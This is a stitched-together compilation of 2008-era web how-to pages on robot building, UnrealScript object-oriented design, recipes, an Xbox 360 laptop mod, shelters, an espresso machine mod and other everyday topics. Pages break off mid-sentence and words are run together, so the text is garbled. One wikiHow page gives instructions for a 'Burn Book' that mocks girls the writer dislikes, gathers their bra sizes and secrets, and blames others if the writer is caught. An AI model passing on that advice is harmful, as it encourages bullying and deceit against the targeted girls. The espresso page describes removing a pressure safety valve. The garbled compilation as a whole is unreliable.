Ok now that you know why you want to build a robot, lets talk about whatyou need to know . . . The first robot is always the hardest. So take the KISS approach: Keep It Simple, Stupid! This is good advice asmy own first robot I aimed too high, wasted a lot of money, and it neverreally worked. While making your very first robot your goals should be tojust learn all the basics: how to program, how to use the tools, terminolo gy,learn basic technology, and how to get robot parts super cheap. Save thatcool robot idea you have for your second robot. You can always scrap thefirst for parts to build the second later. Trust me.

Ok I am ready, what do I need to start?

Obviously the first is MONEY. Robots can get expensive. A skilledroboticist can build a robot for next to nothing ($50, for example). He would often have collected enough stuff over the years that he would not have to goand buy most parts. He also would know how to build his parts instead ofbuying them pre-made, as well as have the skills to improvise. However thebeginner does not have these options. You can make most of your robot outof parts in your house, but don't expect to make your first robot McGyverstyle with just rubber bands and toothpicks. Expect to spend good money fo ryour first 2 or 3 robots. About $100-$200 minimum on your first robot. Ask your parents for it, tell them its educational or something. Tell them you canwin money in contests to pay them back. Tell them it will help you get int oyour university of choice or get you that neat robotics internship. Tell t hem itwill keep you off the streets or from doing drugs. Get a freakin job! You canalso apply for grants at your school or university, and even ask companiesfor money. Tell them their donation gives them tax breaks or something. Ihave raised $4k+ for all my robots together. I even know one guy who got a$20k donation for a single robot!

Your future robots will become more affordable as you become more skilledand have more useful parts around your place. That is another thing, find aplace to build your robot. Join a robotics club. Often members will loan y ou

Mobile robots: RobotinoTheResearch/teachingplatform for universities:mobile,autonomouswww.Festo-Didactic.com

IntelligentRoboticsLearn more about intelligent robots from Adept Techology, Inc. www.adept.com

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GreenMarine's Object Oriented Logic Tutorial http://www.orangesmoothie.org/tuts/GM-OOtutorial.html

1 7 14/4/2008 4:58



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GreenMarine's Object OrientedLogic Tutorial

(with specific references to OO's place in UnrealScript)

"For the layprogrammer." - GreenMarine

"You can use the pepper grinder to create pepper by turning the crank...BUT, apepper grinder is _not_ pepper, so you MUST NOT TRY TO EAT IT!" - Tim Sweeney, Epic MegaGames, Inc.

You can always find the latest version of this document at http://www.OrangeSmoothie.org/tuts/GM-OOtutorial.html.

Drafted by: Brandon "GreenMarine" ReinhartContact: [email protected] Version: 1.0


Constructors Destructors State Advanced Techniques


Talking on #UnrealED and #UnrealScript (both active EF-Net channels on IRC) it has come tomy attention that a lot of interested UnrealScript hackers aren't very familiar with ObjectOriented (OO) logic. In an attempt to do my bit o' public good, I'm writing this tutorial as a shortguide to thinking in OO. Hopefully, by the time you are done reading this, you'll have a strongenough grasp of Object Oriented Programming (OOP) to work uninhibited with UnrealScript.From my experience, I have learned that just by approaching a mod idea or problem with OOdesign in mind, an answer is more easily found. I hope this tutorial is useful to you. I willcontinue to update it for as long as I see necessary. If you have any information or correctionsthan I urge you to email the address above. I will be more than happy to include such items withcredit to the author. This is just the first in a series of useful tutorials (called tuts by the in-crowdhehe) that I plan on authoring. Keep your eyes peeled.


This tutorial may only be transferred by electronic means. It may not be altered in any way,shape, or form without the express, written permission of the author. It may not be included onany CD-ROM archive without the express, written permission of the author. It may not be usedfor any commercial purpose without the express, written permission of the author. The contentsof this document are Copyright (c) 1998, Brandon Reinhart.

The Way Programmers Think

Programmers are a strange breed. They often forget to eat. They often forget to sleep. They eventend to neglect their girlfriend/boyfriend (if they are lucky enough to possess one *hint hint*) allthe while attempting to make rather unintelligent machines more intelligent than any reasonableperson would deem worthwhile. Programmers, you see, are not reasonable people. This lack ofreason is in part due to the aforementioned lack of food, sleep, and sex, and also partly due to the

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Tiny gum wrapper swing set: Create end pieces - Instructables - DIY,... http://www.instructables.com/id/SG8EJHMFDSE959B/

1 2 12/4/2008 6:46

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Tiny gum wrapper swing setby gumwrapper on Mar 14, 2008 in CRAFT & OFFBEAT email it!

step 3 Create end piecesIn this step you'll create supports that will hold the end pieces together and provide stability for the swing.

Take two straight sticks and cross them like you're forming a capital "A" and one of the is the middle piece. Useabout a third of the cross piece and wrap it in a tight spiral up the straight side of the "A".Try to maintain the angle you established when you put them together in the half - "A" shape.Repeat on the other side by adding another straight stick and wrapping a tight spiral up the "A" with the same size connector on that side.

Repeat this to make another cross member support for the other side. Try to make both the same size andkeep the angles consistent on all sides.

Next, slide four sticks with connectors into the cross member connectors as shown to form two "A" supports foreach end of the swing. The cross-member connectors at the top of the "A"s.

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How To : make HOMEMADE LOTSA MEAT PIZZA!!!!!!!!!!!! | eH... http://www.ehow.com/how_2243134_homemade-lotsa-meat-pizza.html

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How to : make HOMEMADE LOTSA MEAT PIZZA!!!!!!!!!!!!By bake4u

Rate: (2 Ratings)

this is an example on what you can conjure up on days you just don't want to cook/you really don't know what to make, that happened to me on this day i made this, no recipe, just thoughts racing through my mind.imagination is theretry it out, let us know what you come up with.

Things You’ll Need:

2-1LB grnd sirlion/chuck,1-lb mild sausage,26oz.chunky Ragu[green pepper mushroom] 16oz jar medium salsa, green-yellow bell pepper, 1- LG onion, 1-bag each: shredded cheddar, fiesta blend colbymontere

Step 1:DO NOT MAKE PIZZA DOUGH BEFORE YOUR TOPPINGS AREFINISHED!!!!!!!!! Sauté the ground meats, sausage together, if you havedrainage drain, set aside, chop in strips the red& yellow bell pepper, onion ,sauté this separately, set aside, mix ragu and salsa sauce with tomato paste,add little water if to thick for your taste,add seasonings to this mix, pepper also, set aside

Step 2:empty 2-boxes pizza crust into mixing bowl, add 1 [one] cup of HOT water fromfaucet, mix till dampened, cover let set 5 minutes minimum, while waiting heat oven to 375 degrees, spray 2-9x13 baking dishes with no-stick spray, lay waxed paper on counter, spread some flour on it, scrape dough out on this floured waxed paper, knead dough adding flour so sticky disappears, transfer dough to 1-[one] baking pan, forming dough to all points of pan, have dough goup all sides and in corners, polk dough with fork all over and bake in oven at 375degrees for 10 [ten] minutes, let cool off, as one cools mix up the other 2 boxes of jiffy crust mix and 1-[one] cup water repeat directions as first pan

Step 3:gather round the toppings you have ready, take cheeses out of fridge, putcouple of spoonfuls of sauce of dough, spread, put the meat in dividing between the 2 dishes, add the yellow/green peppers, onion scatter all over, spread some cheese, spread sauce over this, add more cheese on top, bake inheated oven from pre-baking the crusts, 375degrees for 20 minutes, cool for 10minutes let if rest for 10 more minutes. ENJOY!!!!!!!!!!

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additional information: you could add whatever other ingredients you prefer to use such as pepperoni, {i would cut down other meats if any additional meats are introduced} this makes alot so recipe can be cut inhalf to suit your family, if you have a large family or group gatherings this would suffice.

REMEMBER: pepperoni has alot more fat content and calorie content, using the ground sirloin is lower in fat content, i'm a heart patient so i

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How-To: Make an Xbox 360 laptop (part 1) - Engadget http://www.engadget.com/2007/04/18/how-to-make-an-xbox-360-lapt...

1 14 19/4/2008 4:08

RSS FeedContact usTip us on news!How-To: Make an Xbox 360 laptop (part 1)by Benjamin Heckendorn, posted Apr 18th 2007 at 12:54PM

The making-of How-Tofor the Xbox 360 laptopwill be in three parts. Intoday's segment we'lldiscuss the parts list,stripping down an Xbox360 motherboard, andmodding / reattachingthe DVD and harddrives. The nextinstallment will covercase design,construction andhacking the LCDdisplay, as well aswiring the video. Part 3will then describe wiringall the separate partstogether,troubleshooting, andfinishing up the unit.Full design files will be

including along the way. Let's take a look and prep to get started!

Can't make an Xbox laptop without some parts, so let's see what we'll need.

Parts listXbox 360 Premium system - Or whichever version you wish. With the Elite you could, intheory, make an HDMI-DVI converter and input that into a LCD. The model LCD we used hadDVI but, of course, the XBox we used is still analog. Rats.Westinghouse LCM-17x1 17-inch widescreen monitor - Same as on the first Xbox laptop wedid in 2006. However, by the time we started construction on the second laptop, these have allbut disappeared from the stores. Thankfully there were some still available online, namely fromplaces like eBay. Alternatively, most 17-inch widescreen LCD monitors should work. They'replummeting in price since the 19-inch LCDs are dirt cheap these days. This monitor also givesus a sound amplifier and built-in speakers we can use. The resolution of this screen is 1280 x768 so it fits the high def resolution of the 360 nicely.Xbox 360 WiFi module - Here's half the cost of the project alone! Ha ha, we kid, we kid. Butwhen you're making a "portable" unit, the less wires the better. I've seen these adapters sellused for as low as the "bargain" price of $75. I've heard certain model "thumb" USB WiFiadapters work, but we haven't tested any as of yet.Small, flat USB keyboard - we suggest one such as this. If you can find one with a built-inUSB hub that's even better since you'll actually gain a USB port by using the keyboard.Male headers - These are used to interconnect things between circuit boards. You can pullthem off old motherboards or buy them new. Here's a link to one on Digi-Key.Ribbon cable - As usual I'd suggest the type from old floppy drives and IDE disks. However, forrewiring SATA connections it's best to have thin (as in Ultra ATA 33 and up) solid-strand wire.You can tell if it's solid or stranded by bending the cable -- solid wire cable holds its shape muchbetter than stranded.

Tools you'll need todaySoldering iron. As usual we suggest a low wattage type to avoid damage to parts.Desoldering iron. To remove parts, and is also useful to solder large items that the lowerwattage iron can't handle.Dremel tool - With the ever-important cutoff wheel to slice up things.Wire clippers, small screwdrivers and tweezers - All very handy.X-Acto knives - Again, quite useful for doing delicate (and sometimes not so delicate) hackingwork.Multimeter - Or "voltage meter", whatever you'd like to call it. Very useful for detecting circuitsto discover pinouts.

Stripping down an Xbox 360 motherboard

I'm not going to cover how to take apart the somewhat Pandora's Xbox-esque 360 case since it'scovered elsewhere on the 'net. We'll start by assuming you have it disassembled and down to themotherboard and drives.

Removing parts from the motherboard

We don't need to get into how to desolder in this article since we've covered it before. Some tips onremoving these parts from the motherboard:

It is important to note that the Xbox 360 is RoHS compliant, meaning it uses unleaded solder.In general it's tougher to desolder parts in the RoHS world, so for best results apply some newsolder onto a pin, then heat it with the desoldering iron for longer than you normally would (soabout 4 seconds) before sucking up the solder.Be especially careful with pins that connect to inner ground or power planes, they're also difficultto remove. This is also true of the ground connections on a jack that connect to the mainsurface of the board, such as a USB jack.

Project Planning - HowTo.Lifehack http://howto.lifehack.org/wiki/Project_Planning

1 3 22/4/2008 3:51

Project PlanningFrom HowTo.Lifehack


1 How to Plan a Project2 Step One: Know Your Outcome3 Step Two: Create a Simplified Idea4 Step Three: Shift Risk in Early5 Step Four: Finish6 Step Five: Know When to Quit

How to Plan a Project

So you've decided to start a big project. Maybe you want to write a book, start a blog, make a program or sell aproduct. Working on longer projects can be hard work, but there are few things more satisfying then looking atthe end result of your efforts.

Since organizing and executing personal projects can often be difficult it also gives you a competitive advantage.Many people talk a tough game, planning out big ideas, but then fail to deliver. After doing several longerprojects, I'd like to share some tips to help make your big idea a reality.

Step One: Know Your Outcome

Know exactly what you want to build and give yourself a deadline for when you want it to be completed.Software is often known for suffering from "feature creep." That is extra features continue to be packed onwithout realizing it, greatly expanding the size of the program and limiting its usefulness.

Projects can suffer from creep too. As you get more ideas, you may just continue to expand the project until itcould take years to reasonably complete. There is merit in spending the extra time perfecting your creation, butunless you want it to be a lifelong pursuit you need a deadline.

Unless I already have a lot of experience in an area, I would never plan a project longer than six months without feedback. This means that if you want to write a piece of software, the first public version should take no morethan six months. I might extend this if I had already created a several programs, but otherwise 18-24 monthprojects can be incredibly risky.

Step Two: Create a Simplified Idea

The next step is to know what the core of your idea is. Know what the absolute minimum that must be done inorder for your project to remain a unique expression of your idea. If you are writing a book, know exactly whatchapters must be covered and what ideas are merely ad-ons.

Often your minimal idea is all you have time to do before a release. Planning the best book or program in the

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A short reply to “How do I build/buy a shelter?” 7-30-87 There are three basic types of shelters, fallout, blast, andchemical/biological shelters. Shelters can be made to protect from any one ofthese hazards, or can be protected from any in combination. The easiest to build is a fallout shelter. All that is required of afallout shelter is an area that is protected by mass from fallout radiationwhich consists of alpha, beta, and gamma radiation. The area has to haveventilation appropriate to the climate, season, type of shelter and number ofshelterees. Provisions must be made for measuring radiation, handling humanwastes, providing light, adequate water and food for several days toperhaps several weeks. A source for plans of these shelters are availble inLobdell’s - An Ounce of Prevention, Kearney’s - Nuclear War Survival Skills,from TACDA’s various blueprints, and other sources. They range from do ityourself, at practically no cost temporary (temporary = lasting a year or so)units to $1,000 do it yourself permanent units to $10,000 multipurpose room additions. A blast shelter must be strong enough to withstand overpressure anddynamic pressures from blasts. They must be air tight to accomplish this. This complicates ventilation requirements as a valve, diaphram or member mustseal the sytem during over and under pressures. Doors are needed that can sealair tight and withstand over and under pressure. Information sources are againLobdell, Kearney, TACDA + British Home Office, Marcel Barbier, and variousSwiss government publications some of which have been reprinted by Oak RidgeNational Laboratory. These shelters are more elaborate but can still be homemade by yourself though they require greater effort and skills than a fallout-only shelter. They can be made of wood, steel, or concrete. A chemical/biological shelter is any area that prevents air-borne chemicalgases or chemical, biological, or toxin particles from reaching the shelterees.An air tight enclosure with activated carbon and small particle filters arethe essentials here. A blast shelter can be easily upgraded to a Biological/Chemical shelter with the addition of the needed filters.

How To Blend a Cocoa Mix with Cappuccino and Vanilla Soy | eHow.comhttp://www.ehow.com/how_2225441_cocoa-mix-cappuccino-vanilla-s...

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Instructions Difficulty: Easy

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How to Blend a Cocoa Mix with Cappuccino and Vanilla SoyBy Virginia Allain

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Sometimes a cup of cocoa is your only breakfast, so here's a mix that makes it almost ameal. With the soy included, you get benefits formenopause or lowering blood pressure also.This makes a good substitute when you don't want to drink coffee.

Things You’ll Need:

powdered cocoa mix (diet or regular)French vanilla cappuccino powdervanilla soy meal replacement powder

Step 1:Select your ingredients. Since the cappuccino has fairly highsugar in it, I use the diet cocoa mix to compensate. For thesoy, I select vanilla soy in a powdered meal replacement.The vanilla gives a creamy flavor to the mix.

Step 2:Mix equal amounts of the cocoa mix, cappuccino and vanillasoy powders.

Step 3:Stir until well blended. Use a spoon or a whisk for this.

Step 4:Transfer it to a tightly sealed container. Using a nice canisterfor your special blend starts the morning off right.

Step 5:Use two scoops of the mix for a large mug. Adjust this to match your taste.

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I find Swiss Miss dissolves the best of any cocoa mix in hot water.

Buy the large containers of the various flavors at a warehouse store like

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How to Write a Song - Mahalo http://www.mahalo.com/How_to_Write_a_Song

1 8 19/4/2008 2:47

How to Write a SongAlso try: How to Write a Love Song for your Girlfriend | How to Copyright Your Music | How to Start a Band | How to Succeed in a Band

Guide Note:Writing a song can be a frustrating process if you're not sure how to go about it. Luckily, there are plenty ofmethods that can inspire you to compose that next chart-topper. This page will walk you through many ofthe basics of How to Write a Song and provide you with a few ideas to jump start the creative process.

Table of Contents:

IntroductionStep 1: Getting StartedStep 2: Song SectionsStep 3: Lyrical ThemeStep 4: Writing the LyricsStep 5: ArrangementConclusionResources for How to Write a Song


No matter what you may have heard, there's no magic formula to writing a song. The process is differentfor everyone, and there's no right or wrong way to do it. A good song doesn't have to sound a certain wayor fit into a certain mold. All it needs to be is honest and from the heart in order to connect with anaudience.

Sometimes it seems like the music just flows out of you effortlessly. But if you find yourself totally stuck(or you don't even know where to begin when writing a song), this page could help you find the inspiration you've been needing to get out of that rut and onto the charts. Browse the sections below fortips that may help jumpstart your creative process when you've hit the wall.

Step 1: Getting Started

The process of songwriting does not have to be in any particular order. Some people write lyrics beforethe music, others compose the music first, and still others write them at the same time.

For the purposes of this page, we will talk about writing the music first. While this is the method of choicefor many songwriters, you should figure out what process makes the most sense to you. Writing music isa very personal thing, and mixing it up a bit every once in a while can help you combat songwriter's block, too.

NOTE:There's never any right or wrong when it comes to music. All too often, musicians get mentally stuck on"rules" they have to follow, but there are no rules when it comes to art! The information on this page issimply one method to writing songs.

Two tips before you begin:

When writing a chord progression, it helps to at least know basic chord theory.It will help you understand the functions of various chords in a given key, but when it comes down


How-To: Mod your espresso machine - Engadget http://www.engadget.com/2006/08/08/how-to-mod-your-espresso-mac...

1 8 20/4/2008 10:15

RSS FeedContact usTip us on news!How-To: Mod your espresso machineby Will O'Brien, posted Aug 8th 2006 at 2:44PM

The quest for caffeineleads many a geek downthe road to espresso, aswe know all too well. Wehaven't gotten around toturning a MacBook into anespresso machine... yet,but we just can't resistmodifying our stuff.Today's How-To is a bitalong the lines of TimTaylor, but it's all about theespresso.

Today's victim is ourprized ECM Giotto. It wasmisbehaving recently, sowe took it apart. While wewere visiting her innards,we just couldn't resistmaking a small upgrade tothe pump system.

The original configurationis on the left. The pumpsupplies pressure ondemand, and the OPV(Over Pressure Valve)keeps the pressure fromrising too high. The rotarypump has a built-inpressure regulator, andrequires a relay tocompensate for the higherpower draw. Some preferto leave the OPV in placeas a safety reliefmechanism. We chose toremove ours completely(of course).

Here's the old Ulka pump,which we decided toreplace with this slightlybigger one. Allright, it'sway bigger. We'reupgrading the puny 41watt Ulka vibration pumpto a new 1/3 horsepowermotor with a rebuilt brassrotary ProCon pump.

We're not hooking ourmachine up to theplumbing, but we wanted abigger water reservoir. Wehad a PUR waterdispenser handy. Theclear container lets uskeep an eye on our waterlevels and if we can tapwater from the spout, wecan take advantage ofgravity to provide constantpressure to the rotarypump.

A quick trip to thehardware store and wefound that a piece of5/8-inch inner diametervinyl hose fit perfectly overthe oval shaped spout. Weadded a zip tie to secure itand a barb adapterconnects it to our 1/2-inchbraided PVC supply line.

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A Beginner's Guide to Watching Wildlife http://animals.about.com/od/animalswildlife101/a/startwatchingwi.htm

1 2 19/4/2008 3:11

Animals / Wildlife

A Beginner's Guide to Watching WildlifeFrom Laura Klappenbach,Your Guide to Animals / Wildlife.FREE Newsletter. Sign Up Now!

How to Learn About Animals First-Hand

Modern lifestyles separate us from the natural world. We live in houses sealed with windows, doors, and screens that keep the outside out and the inside in. We work in climate-controlled offices where weather can sway a dozen ways from sunup to sundown and we are none the wiser. Thus, to say we want to learn about animals and wildlife is to say we want to step outside the confines of these human 'habitats' into the natural world: a world in which we are one of countless lifeforms that share thisplanet we call Earth.

The Simple Act of Going Outside

To begin our journey into the world of wildlife, we start by simply going outside. Wherever you are—city or suburb,farm or remote island—nature is all around, but you have to go outside to see it. Of course, the simple act ofstepping outside leads to a more complex act of dealing with weather.

So be sure you dress appropriately for the climate that's outside your door.

Once outside, you may wonder what to do next. That too is simple. You should listen, look, smell, wonder and wait. What is the first sign of wildlife you can detect? Do you catch a glimpse of a bird flying quickly through your yard? Does a squirrel scamper up a tree across the street? Is there a line of ants making their way across the sidewalk? Do you hear the croaking of a frog in the distance?

Whatever sign of wildlife you detect is a starting point and from there you are ready for the next step: Learning to Ask Many, Silly Questions.

Ask Lots of Questions

"Where do you live? In the city. You have a house? Apartment. Own or rent? Rent. What do you do for a living? Lotsof things. Where's your office? I don't have one. How come? I don't need one. Where's your wife? Don't have one. How come? It's a long story. You have kids? No I don't. How come? It's an even longer story. Are you my Dad's brother? What's your record for consecutive questions asked? 38. I'm your Dad's brother alright. You have much more hair in your nose than my Dad. How nice of you to notice. I'm a kid - that's my job." ~Miles questioning Buck in 'Uncle Buck'

Suppose you have spotted a bird swoop through your yard. Since you're determined to learn more about animals and wildlife, you start to ask questions.

Where did that bird come from? Did it dive down from a perch in a tall tree? Did it take off from the ground where it had been gathering food? What did it look like? Was it dark? Light? Bigger than a breadbox? Did it have a long tail or a short broad tail? Did its wings make a flapping sound or were the slient? Did it sing a song? Did it labor to get into the air or did it flit about with great agility?

Don't worry about the complexity or grammatical correctness of your questions. Don't be afraid to ask silly questions. Answer as many questions as you can but don't worry if you don't have all the answers. Just get in the habit of questioning, because it is the key to noticing things about the world around you and noticing things is the key to learning more about animals and wildlife.

A Pocket-Sized Notebook and Waterproof Pen

Once you get in the habit of asking questions you'll find it can be addictive and you may come up with quite a few queries that you cannot answer on the spot nor remember this side of nightfall without writing them down. So the simple solution is to buy yourself a pocket-sized notebook and a waterproof pen. Then when you're out in the field or wandering the town and come across wildlife and questions bubble to the surface, simply jot them down so you can research and contemplate them later.

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How To Break a Coconut | eHow.com http://www.ehow.com/how_2054749_break-coconut.html

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Instructions Difficulty: Moderate

How to Break a CoconutBy eHow Food & Drink Editor

Rate: (2 Ratings)

Coconuts always look so darn appetizing. Images often pop to mind of sitting on a deserted island with your feet in the sand, drinking a refreshing rum beverage right from a coconut that just fell from a tree. But that image is quickly erased when you soon realize how hard it is to open the darn things.

Things You’ll Need:

NailHammerTowelCleaver (alternate way)Glass or bowl

Step 1:Inspect the coconut. Usually coconuts will have some dark areas on them.About the size of the dime, there are usually three such areas. These are the weakest points of the coconut. Using that area's weakness, it's time to break out the hammer!

Step 2:Nail the coconut. Literally. Lay out your towel and place the coconut on top.Then using your hammer and nail, nail into one of the weak spots on the coconut. Don't drive the nail all the way. Just enough so that you feel it break through the shell to the hollow middle. Remove the nail.

Step 3:Drain the coconut. Next place the coconut over a short glass or bowl with thehole side down. Let the coconut drain for 3 minutes or so. If you wish you may drink the coconut milk, or save it, and make drinks with it. (It's quite tasty with rum!)

Step 4:Place your coconut back in the towel. Now it's time to take out someaggression! Once in the towel, take your hammer and strike the coconut forcefully. This may be best done on the ground or on pavement, as you will need to strike it quite hard and you don't want to ruin your counter top. Continue striking the coconut until you feel it break. You may continue to strike it a few more times until you have broken it into several pieces. This make it easier to grate or remove the "meat" of the coconut.

Step 5:Use your knife. This is an alternate way to break a coconut and perhaps a tadmore impressive in front of your friends. But it should be noted that this is not for children to try. And if you feel your child is old enough, be sure to supervise them closely. Take a heavy cleaver knife in one hand and the coconut in the other. Then rotate the knife so that the BLADE IS FACING UP, AWAY FROM THE COCONUT, and strike the coconut with back of the blade. It will probably take several forceful whacks as it did with the hammer. Also be sure to strike the coconut in the center. This will keep it from flying out of your hand and also distribute the most amount of force throughout the shell. Congratulations, you have just learned how to break a coconut!

Virgin Coconut Oilinfos, natural cosmetics and more Kokosöl, Naturkosmetik und mehrwww.tropicai.com

Weave Coconut Palm Frondsstep by step photos 11 projects clear instructions nothing left outwww.caning.com

10 Skinny RulesI lost 9 lbs. in 11 days, just by following these 10 simple rules.FatLoss4Idiots.com

Coconut Grove HotelsDon't waste time! Compare prices for popular hotels & book now.CoconutGrove.OneTime.com

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How can I improve my search results? http://www.lib.monash.edu.au/vl/www/www19.htm

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How can I improve my search results?

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use more search terms to get fewer, more relevant recordsuse fewer search terms to get more recordssearch for phrases (i.e. words next to each other in the order you specified) by enclosing search terms in inverted commas (e.g. "robertmenzies")choose search engines that allow you to refine your search results (e.g.AltaVista)limit your searches to Australian or national sites:

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use Boolean operators or '+' (an essential term) and '-' symbol (for a termthat should be excluded) to refine your search


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How To Paint faux marble - OpenTutorial http://www.opentutorial.com/Paint_faux_marble

1 3 12/4/2008 7:48

Paint faux marbleFrom OpenTutorial

Faux marble or faux marblingis the painting of painting surfaces so as to imitate the appearance of polished marble. It is typically used in buildings where the cost or weight of genuine marble would be prohibitive.

Faux marbling is a special case of faux stone painting, although the distinctive and varied patterns of marble make it the most imitated stone by far.


1 History2 How to paint faux marble

2.1 Materials and equipment2.2 Method

2.2.1 Stage 12.2.2 Stage 22.2.3 Stage 32.2.4 Stage 4

3 External links


Faux stone painting was widely used in Pompeii, but it really took off in Europe during the Renaissance with two schools of faux marbling developing. The Italian school was loose and artistic, the French school was formal and realistic. It typically took an apprentice ten years or more to fully master the art.

Modern professional marblers are very skilled and will use a variety of techniques to closely imitate real marbles but many decorators are happy to merely suggest the appearance of marble rather than accurately imitate a particular stone. It is not as difficult to do as it looks. It is perfectly possible for an amateur to produce a beautiful effect with a little practice.

How to paint faux marble

Materials and equipment

White eggshell paint {sometimes known as semigloss of softsheen}Boiled linseed oil {Available in the wood treatment section of a "Do-it-Yourself" store. It is used to slow the paint drying time}White spirit {to thin the paint and clean the brushes}A tube of black artist oil paint. "Lamp black" is niceBrushes, one of which should be good quality and very soft.Two feathers, the traditional one to use is goose but any large feather will do.Some rags or lint-free cloths


Ads by Google Glass Marble Clean Marble Blue Marble Marble Samples Paint Tips

How To Feed Your Family on a Budget | How To Do Things.com http://www.howtodothings.com/finance-real-estate/how-to-feed-your-...

1 2 13/4/2008 10:18




By Sonia C

Difficulty: Cost:

How To Feed Your Family on a BudgetLearning to Deal with Rising Food Prices

All over North America, grocery prices are going up. The increase in cost of simple staples like bread,

cheese, and milk from five years ago can seem overwhelming. But before you let the anxiety of

feeding your family lead to the loss of your hair, take a few moments to consider what you already

have in your cupboards, and what your family likes to eat. You might find you have more meal

options than you thought.

Gather together all the your receipts from the last couple of months and determine

exactly how much you spend on food over the course of a month. Be realistic and decide

on a dollar amount. It's important to try and not compare your spending habits to those of your

friends and family. Remember prices can vary considerably from one city or province to another,

and tastes can also vary a lot from one family to the next, and there is no point cooking meals no

one will eat. Once you have a firm number, the easiest way to keep on budget is by withdrawing

half this amount twice a month, or a quarter each week, before you go shopping. I have found

this extremely difficult to do. But as hard as it is to leave the credit and debit cards at home,

using cash is the most effective way to make sure your hard earned money is spent on real food

and not on tempting impulse or instant items at the grocery store, or on restaurant meals.


Consider what your family eats and find recipes. The quickest way to shave dollars from

your food budget is to do more food prep yourself. Dust off your cook books, explore the web,

and improve your culinary skills. Cooking dinners at home also allows you to add more nutritional

value to each meal. If you are short on time, consider doubling or tripling recipes and freezing

the extras.


Armed with cash and a list of staple ingredients, go shopping! I recommend exploring

your local discount or warehouse chain, as well as visiting farmers markets in the summer. Years

ago one could save a lot of money by driving from store to store buying up door stoppers and

sale items, but with the increase in gas prices spending extra time chasing down the cheapest

price does not always work out to be the cheapest option. Don't let the large packages

intimidated you, most items can be divided into meal size portions as you put them away at

home. Another option is to prepare and freeze items, creating homemade heat and serve meals;

a nice option on nights when you have no time or desire to cook.

Here is a list of inexpensive staples I keep on hand:

Bulk bread (I prefer pre-sliced)

Bulk bagel or flat breads




Another variety of bulk cracker

Peanut butter


Eggs (two flats -- one raw, one hard-boiled for snacking)



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How to Report a Lost or Stolen Passport - Mahalo http://www.mahalo.com/How_to_Report_a_Lost_or_Stolen_Passport

1 3 19/4/2008 2:40

How to Report a Lost or Stolen Passportby Tracy C.

Guide Note: Losing your passport or having it stolen isn't the end of the world. Read our How to Report a Lost or Stolen Passport guide to learn how to remedy the situation promptly.


Not only is losing your passport frustrating, it could strand you far from home. Luckily, to report yourlost or stolen passport and replace it as quickly as possible, you'll just need to fill out a couple of forms.Frequent travelers may wish to download the proper forms before a trip and keep them on hand in order to speed up the replacement process if it becomes necessary. Read below to learn the two simple steps toreplacing a lost or stolen passport, and you'll be on your way.

Step 1: Report It

You won't usually get this lucky. (Creative commons photo by Daniel Lobo)

You'll need to report your lost or stolen passport as soon as possible.

Fill out the DS-64 form provided by the U.S. State Department.1.Fill out as much information from your lost or stolen passport as possible.2.Answer all the questions on the form in as much detail as possible. Questions range from asking forpersonal information such as name, address, and where your passport was issued to asking for what you know about the potential theft and if your passport has been lost in the past.


Ideally, you will have made an extra copy of your passport to carry with you, and you'll have left another with a friend at home (as advised in How to Get a Passport). Then, you will have a copy forreference when completing your form.


Mail your form to the State Department:5.

U.S. Department of StatePassport ServicesConsular Lost/Stolen Passport Section1111 19th Street, NW, Suite 500Washington, DC 20036

If You are Overseas

How to Register to Vote - Mahalo http://www.mahalo.com/How_to_Register_to_Vote

1 3 19/4/2008 2:29

How to Register to VoteAlso try: How to Vote | How to Choose a Candidate | How to Choose a Political Party

Guide Note:Before you head off to your local polling place on election day, you're going to need to know How to Register to Vote. This page will explain how to make your vote count!


Registering to voteis a painless process. You can register in a number of ways, including online or by mail. This page willtell you how you can get it out of the way so you'll be fully prepared on election day.

Why Register?

(Creative Commons photo by Sam Felder)

Registering is important because:

They will have a record of who you are when you go to the polling place, and1.You will be mailed (or be able to find online) all of the pertinent details and information regarding anyupcoming elections.


The main reason to register? You can't vote at all if you don't do it! Once registered, you will be kept upto date any time an election is approaching with the following information:

The date and time of the election.1.The address of the voting location nearest to you.2.The candidates' names, parties, and, in some cases, general stances on certain issues.3.A description of any voter initiatives.4.A sample ballot, complete with instructions on how the voting process will work.

You can use the sample ballot to practice casting your vote so that you know exactly what to expectcome election day.In some cases, the sample ballot can be brought into the voting booth to save time.


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How to Make Your Burn Book Look Cute - wikiHow http://www.wikihow.com/Make-Your-Burn-Book-Look-Cute

1 2 19/4/2008 2:53




How to Make Your Burn Book Look CuteYou've kept your Burn Book in an old, tattered notebook. Now it's time to take it up a notch.

StepsGet out your Burn Book and look through the pages. Think about what you would like to change and what you would like tokeep.


Tear out any pages with stuff on them you'd like to keep. Paste the pictures into a fresh scrapbook. Make one page forevery girl you don't like. You can write captions around them with jelly pens or Sharpie pens.


Here is the most fun part. Cut out pictures & words from magazines and paste them on the front cover. Write some stufflike, "Only the strong survive."


Add stickers and whatever you love.4.

Get out new photos. Take some at school, too. Keep pasting the photographs into the book, but hide the book, and neverbring it to school! This step goes on until you are tired of the book. A burn book isn't something you make in a week. It'ssort of a day-to-day process.


TipsWhat to include in each girl's page:

Do the dirty work of taking a survey. Ask every girl that you don't like and is in your grade what their bra size is, and writetheir size on the top right-hand corner of every page. Carry a note pad and pencil in your purse at lunch, trying to get everygirl's size.

Include what clique they belong to, hair and eye color, crushes, secrets, etc.

Where to hide the Burn Book:

Under your mattress

In a secluded area that only your girlfriends know about.

In a shoe-box underneath the trap-door that goes to underneath your house!

Inside a locked "thingy" that only you know the combination to.

Other Tips

You can choose to keep the book private, or share it with some select friends.

Trade the book back and forth.

WarningsNever let anyone see that you are the one who made it. (This is mean, but, if you do get caught, you can blame it on ananonymous friend.)

To make it seem like it's not you or your friends who wrote it, put mean comments about yourself. Have your friends makecomments about themselves, too.

The How-to Manual That You Can Edit

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How To Celebrate International Women's Day | How To Do Things.com http://www.howtodothings.com/education/how-to-celebrate-internation...

1 3 13/4/2008 10:19




By Mary Norton

How To Celebrate International Women's DayMarch 8

March 8 is now designated as the annual celebration of the political, economic and social

achievements of women who continue to struggle in so many countries to live on an equal basis with

men. The day recognizes women's contributions, especially in the undervalued roles of keeping a

home and raising children. Women must play the leadership role in building and sustaining families

both in the social and economic chaos of the developed world and in the life-threatening turbulence

and poverty in Africa and Asia. Women's Day has now become global and has been designated as a

national holiday in countries which recognize that in so many ways, the real heroes of our time are

not the newsmakers, but the half of humanity that carries half the weight of our future with so little

daily recognition.

This day is the perfect time to celebrate the achievements of the past century in the valuing of

women. It is a time also to think, if in the race for equal status, economic measures have begun to

outweigh every other consideration. Perhaps, more importantly, it is a time to remember that in much

